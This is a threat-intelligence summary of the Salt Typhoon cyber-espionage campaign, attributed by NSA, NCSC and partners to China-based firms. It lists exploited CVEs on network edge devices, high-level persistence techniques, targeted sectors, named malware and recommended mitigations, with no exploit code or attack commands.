Full Report
The U.S. National Security Agency (NSA), the UK's National Cyber Security Centre (NCSC), and partners from over a dozen countries have linked the Salt Typhoon global hacking campaigns to three China-based technology firms. [...]
Analysis Summary
# Threat Actor: Salt Typhoon
## Attribution & Identity
The threat actor, known as Salt Typhoon, is linked to **China-based technology firms** acting on behalf of the **China's Ministry of State Security (MSS)** and the **People's Liberation Army (PLA)**.
Associated entities providing cyber products and services include:
* Sichuan Juxinhe Network Technology Co. Ltd.
* Beijing Huanyu Tianqiong Information Technology Co.
* Sichuan Zhixin Ruijie Network Technology Co. Ltd.
## Activity Summary
Salt Typhoon has been active since at least 2021 conducting global hacking campaigns focused on cyber espionage. Recent activities include concerted attacks on telecommunication firms over the past couple of years to spy on private communications. The group was also linked to a nine-month breach of a U.S. Army National Guard network in 2024, where they stole configuration files and administrator credentials.
## Tactics, Techniques & Procedures
- Exploiting **widely known and fixed flaws** on network edge devices (not relying on zero-days).
- Exploitation of specific vulnerabilities:
- **CVE-2024-21887** (Ivanti Connect Secure command injection)
- **CVE-2024-3400** (Palo Alto PAN-OS GlobalProtect RCE)
- **CVE-2023-20273** and **CVE-2023-20198** (Cisco IOS XE authentication bypass and privilege escalation)
- **CVE-2018-0171** (Cisco Smart Install RCE)
- Gaining initial access to routing and network devices to modify Access Control Lists (ACLs).
- Enabling SSH on non-standard ports.
- Creating GRE/IPsec tunnels for C2/persistence.
- Exploiting Cisco Guest Shell containers for persistence.
- Pivoting into other networks using compromised devices and trusted connections.
- Collecting packet captures of authentication traffic.
- Redirecting TACACS+ servers.
## Targeting
- Sectors: Government, telecommunications, transportation, lodging, and military networks.
- Geography: Worldwide targets, including the U.S. and Canada.
- Victims: Major U.S. carriers (AT&T, Verizon, Lumen), U.S. Army National Guard, and various government entities globally.
## Tools & Infrastructure
- Malware families used: Custom Golang-based SFTP tools labeled **"cmd1," "cmd3," "new2," and "sft."**
- Custom malware known as **JumbledPath** used to monitor and capture traffic from telecom networks.
- Infrastructure: Used GRE tunnels for persistent access and focused on exploiting network edge devices (routers/VPNs).
## Implications
Salt Typhoon is an active, state-sponsored cyber espionage operation focused on intelligence gathering, particularly communications interception and tracking movements of high-value targets. Their reliance on known, patched vulnerabilities suggests operational acceptance of the risk in exchange for widespread access, indicating a focus on exploiting poor patch management in targeted sectors, especially telecommunications. Their access to law enforcement wiretap systems represents a severe threat to national security and individual privacy.
## Mitigations
- **Prioritize patching** network edge devices, especially those facing the internet, given the use of known vulnerabilities with available fixes.
- **Harden device configurations** and monitor for unauthorized changes.
- Restrict management services to dedicated, segmented networks.
- Enforce secure protocols (SSHv2, SNMPv3).
- Disable legacy features like **Cisco Smart Install (SMI)** and **Cisco Guest Shell** where not required.
- Actively search for signs of compromise leveraging behavioral indicators rather than relying solely on signature detection (due to non-zero-day exploitation).